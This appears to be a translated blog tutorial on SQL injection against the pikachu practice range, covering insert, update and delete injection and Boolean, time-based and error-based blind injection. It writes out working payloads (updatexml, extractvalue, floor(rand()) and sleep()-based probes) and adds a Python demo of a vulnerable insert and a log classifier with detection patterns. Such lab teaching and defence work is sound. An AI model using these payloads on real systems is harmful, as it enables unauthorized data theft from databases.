SQL injection (query method and blind injection)

Many injection points have no echo (the query result is never displayed on the page), and this is often caused by the kind of SQL statement the input lands in. In that case we fall back on error-based or blind injection for the subsequent steps.

The four kinds of SQL statement (insert, delete, update and select) can all carry injection:

For example, an injectable insert statement lets us inject into the database during user registration.

We need to identify the injection point and guess the SQL statement type from where the injection point arises; it is not limited to select statements. Work out how the website function relates to the database from what the page does, and guess the query type accordingly.

pikachu range, hands-on:
Injection may occur during login / registration:

Look at the source code of the registration page:

When trying to inject into the registration form, the order by probe only produces an error and reveals no configuration details, because the insert statement does not support it: only an error is returned and the statement is not executed. Blind injection is required at this point!:

You can echo "$query" in the PHP code and then analyze the assembled statement in MySQL:
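As an added example (not part of the original post and not pikachu's own code), the following Python script uses sqlite3 in place of MySQL to build the registration INSERT the way a concatenating PHP page does, so the assembled statement can be printed exactly as echo "$query" would show it, and contrasts it with a parameterized insert. The table name, column names and sample form values are assumptions for illustration; SQLite has no updatexml(), so the error text differs from MySQL's XPath error, but the effect described above (an error comes back and the row is not inserted) is the same.

```python
import sqlite3

# Registration form as the post's pikachu payloads send it (constructed sample;
# table and column names are assumptions, not pikachu's own schema).
FORM = {
    "username": "alice",
    "password": "xiaodi",
    "sex": "男",
    "phonenum": "13878787788",
    "email": "wuhan",
    "add": "hubei",
}
FIELDS = ("username", "password", "sex", "phonenum", "email", "add")
COLUMNS = ("username", "pw", "sex", "phonenum", "email", "address")


def build_query_unsafe(form):
    """Assemble the INSERT by string concatenation, as a vulnerable PHP page does.
    The returned string is what echo "$query" would print."""
    values = ",".join(f"'{form[k]}'" for k in FIELDS)
    return f"INSERT INTO member({','.join(COLUMNS)}) VALUES({values})"


def register_unsafe(conn, form):
    """Run the concatenated statement; return (echoed query, error message or None)."""
    query = build_query_unsafe(form)
    try:
        conn.execute(query)
        return query, None
    except sqlite3.Error as exc:
        # The database error text is what an error-based payload relies on being displayed.
        return query, str(exc)


def register_safe(conn, form):
    """Parameterized insert: user input is bound as data, never parsed as SQL."""
    conn.execute(
        f"INSERT INTO member({','.join(COLUMNS)}) VALUES(?,?,?,?,?,?)",
        tuple(form[k] for k in FIELDS),
    )


def stored_usernames(conn):
    return [row[0] for row in conn.execute("SELECT username FROM member ORDER BY rowid")]


def run_demo():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE member(username TEXT, pw TEXT, sex TEXT, phonenum TEXT, email TEXT, address TEXT)"
    )

    register_safe(conn, FORM)  # a normal user

    # Same shape as the post's payloads: close the quote, add an OR expression, reopen the quote.
    tautology = dict(FORM, username="x' or 1 or '")
    echoed, err = register_unsafe(conn, tautology)  # expression is evaluated: '1' is stored
    register_safe(conn, tautology)                  # the literal text is stored unchanged

    # Error-based shape: a function call the database rejects (MySQL's updatexml is unknown here).
    erroring = dict(FORM, username="x' or updatexml(1,concat(0x7e,(version())),0) or '")
    _, err2 = register_unsafe(conn, erroring)       # error returned, no row inserted

    return echoed, err, err2, stored_usernames(conn)


if __name__ == "__main__":
    echoed, err, err2, rows = run_demo()
    print("echo $query ->", echoed)
    print("error for tautology payload:", err)
    print("error for updatexml payload:", err2)
    print("stored usernames:", rows)
```

Running it prints the concatenated statement with the OR expression spliced into the VALUES list, then shows that the unsafe path stored the evaluated expression, the parameterized path stored the attacker's text verbatim, and the erroring payload inserted nothing while handing back a database error message.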

Blind injection:

Blind injection means that, during injection, the retrieved data cannot be echoed to the front-end page, so we have to use other methods to judge or probe; this process is called blind injection. Blind injection falls into the following three categories:

  • Boolean-based blind injection: logical judgment (a true/false condition, with no echo of data): regexp, like, ascii, left, ord, mid

  • Time-based blind injection: delay judgment (no echo): if, sleep

  • Error-based blind injection: the data is echoed through an error message: floor, updatexml, extractvalue, etc.

Different databases may have different function names, but the principle is the same.

12 kinds of error-based injection + universal statements

Error-based injection: pikachu range insert injection:

Database information returned in the error message (0x7e is "~", used as a marker for identification and filtering):

Version information returned in the error:

Query the name of the database the website uses:


pikachu insert

username=x' or(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or '&password=xiaodi&sex=%E7%94%B7&phonenum=13878787788&email=wuhan&add=hubei&submit=submit

username=x' or updatexml(1,concat(0x7e,(version())),0) or

username=x' or extractvalue(1,concat(0x7e,database())) or

pikachu update

sex=%E7%94%B7&phonenum=13878787788&add=hubeNicky' or (select 1 from(select count(*),concat( floor(rand(0)*2),0x7e,(database()),0x7e)x from information_schema.character_sets group by x)a) or '&email=wuhan&submit=submit 

sex=%E7%94%B7&phonenum=13878787788&add=hubeNicky' or updatexml(1,concat(0x7e,(version())),0) or '&email=wuhan&submit=submit

sex=%E7%94%B7&phonenum=13878787788&add=Nicky' or extractvalue(1,concat(0x7e,database())) or '&email=wuhan&submit=submit

pikachu delete

Similarly, on the profile-modification page reached after a successful login, update-statement injection and delete injection can be used. Injection may exist wherever there is interaction with the database!:

Time-based injection:

sleep function:

if function:

Combined with an insert, if() returns 1 when the condition is true, so the response is delayed by 1 second; if it is false, the response comes back immediately:

At the same time, substr() can cut out part of the value, which makes black-box guessing easier. Likewise length() and similar functions convert the result into a number that can be tested as true or false:

The ascii() function is even more recommended, because it makes it convenient to write Python scripts that iterate over the characters and brute-force the flag:

ASCII table:

Delay-based judgment of a specific table name:

and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(3),0)--+

The limit 0,1 clause: in the tables table of the information_schema database, the first number is the offset (0 means start from the first row) and the second is the number of rows returned (1 returns one row, 2 returns two rows, and so on):

Boolean-based injection:

When the injection succeeds / the condition is true, the data is not echoed, but "You are in..." appears:

If the condition does not hold, there is no echo, which proves that the database version number does not begin with 6:

The principle is in fact similar to time-based injection; the main difference is in the functions used.
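As an added example from the defender's side (not from the original post and not pikachu's own code), the Python script below classifies constructed request records, modelled on the payload shapes listed above, into the three blind-injection categories: error-based by the reporting functions (updatexml, extractvalue, floor(rand())), time-based by sleep()/benchmark() combined with the observed response time, and Boolean-based by a comparison or string function following and/or. The paths, latencies, the delay threshold and the benign records are assumptions, and the signatures are a starting point for log review rather than a complete ruleset.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log records: (request line, POST body, response time in ms).
# Paths and timings are assumptions; the payload shapes follow the ones shown in the post.
SAMPLE_LOG = [
    ("POST /register", "username=alice&password=s3cret&sex=%E7%94%B7&phonenum=13878787788&email=wuhan&add=hubei&submit=submit", 14),
    ("POST /register", "username=x' or updatexml(1,concat(0x7e,(version())),0) or '&password=xiaodi&submit=submit", 11),
    ("POST /register", "username=x' or extractvalue(1,concat(0x7e,database())) or '&password=xiaodi&submit=submit", 13),
    ("POST /update", "sex=%E7%94%B7&add=Nicky' or (select 1 from(select count(*),concat(floor(rand(0)*2),0x7e,(database()),0x7e)x from information_schema.character_sets group by x)a) or '&submit=submit", 15),
    ("GET /search?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(3),0)--+", "", 3012),
    ("GET /search?id=1' and if(ascii(substr(database(),1,1))=110,sleep(3),0)--+", "", 9),
    ("GET /search?id=1' and left(version(),1)=5--+", "", 10),
    ("GET /search?id=O'Brien", "", 8),  # a benign apostrophe must not be flagged
]

# Error-based: functions whose error message carries attacker-chosen data.
ERROR_BASED = re.compile(r"\b(updatexml|extractvalue)\s*\(|\bfloor\s*\(\s*rand\s*\(", re.I)
# Time-based: delay functions.
TIME_BASED = re.compile(r"\b(sleep|benchmark)\s*\(", re.I)
# Boolean-based: a string/comparison function or numeric tautology right after and/or.
BOOLEAN_BASED = re.compile(
    r"\b(and|or)\s+(ascii|ord|left|mid|substr|substring|length|regexp|like)\b"
    r"|\b(and|or)\s+\d+\s*=\s*\d+",
    re.I,
)
DELAY_THRESHOLD_MS = 2000  # assumption: anything slower is treated as a sleep() that fired


def classify(request_line, body, latency_ms):
    """Return the blind-injection categories a single record matches (possibly none)."""
    # Decode URL encoding first, otherwise %27 / + would hide the keywords.
    text = unquote_plus(request_line + " " + body).lower()
    findings = []
    if ERROR_BASED.search(text):
        findings.append("error-based")
    if TIME_BASED.search(text):
        # The same sleep() payload is reported differently depending on whether the delay
        # fired: a slow response means the attacker's condition evaluated to true.
        observed = "delay observed" if latency_ms >= DELAY_THRESHOLD_MS else "no delay observed"
        findings.append(f"time-based, {observed}")
    if BOOLEAN_BASED.search(text):
        findings.append("boolean-based")
    return findings


def scan(log):
    """Return (record index, findings) for every record that matched at least one category."""
    return [(i, f) for i, (req, body, ms) in enumerate(log) if (f := classify(req, body, ms))]


if __name__ == "__main__":
    for index, findings in scan(SAMPLE_LOG):
        print(f"record {index}: {', '.join(findings)}")
```

Pairing the sleep() signature with the measured response time is what turns a noisy keyword match into evidence: a run of sleep() requests where only some responses are slow is the fingerprint of a condition being tested one character at a time, which is exactly the probing the section above describes.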

For more payloads, read the sqli-labs "book of heaven" walkthrough. It is relatively complete; get into the good habit of reading documentation.

Tags: Database SQL Web Security

Posted on Tue, 09 Nov 2021 20:19:00 -0500 by MikeX